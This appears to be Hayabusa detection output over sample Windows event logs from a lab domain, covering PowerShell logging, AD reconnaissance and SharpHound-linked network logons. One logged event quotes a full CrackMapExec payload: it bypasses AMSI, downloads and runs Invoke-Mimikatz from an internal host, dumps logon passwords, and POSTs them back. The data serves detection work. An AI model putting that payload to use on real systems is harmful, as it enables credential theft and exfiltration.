Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:55.923 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Variable): ""Set-Variable"" ParameterBinding(Set-Variable): name=""Name""; value=""Ofs"" ParameterBinding(Set-Variable): name=""Value""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:55.942 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ ([int] $_ -AS [ChAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.691 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Item): ""Set-Item"" ParameterBinding(Set-Item): name=""Path""; value=""VaRiAble:Ofs"" ParameterBinding(Set-Item): name=""Value""; value="" """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Invoke-Expression): ""Invoke-Expression"" ParameterBinding(Invoke-Expression): name=""Command""; value=""[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = 
[System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('https://10.23.123.11:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://10.23.123.11:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()"" TerminatingError(Invoke-Expression): ""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.253 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.255 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.274 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.369 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.422 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec 
payload execution.evtx 2021-05-01 05:32:57.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.450 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.469 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.477 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-String): ""Out-String"" CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""Transcript""; value=""True"" ParameterBinding(Out-String): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... 
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software."" ParameterBinding(Out-Default): name=""InputObject""; value=""Invoke-Expression : At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + . ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}10 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.512 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.513 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.522 
+09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.524 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.542 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.556 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.597 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... 
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:57.626 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx 2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx 2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x88f3141d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0xbe8573e4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0xbe857415,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x61e272d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd7ba,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2a1f2809,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2220054d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 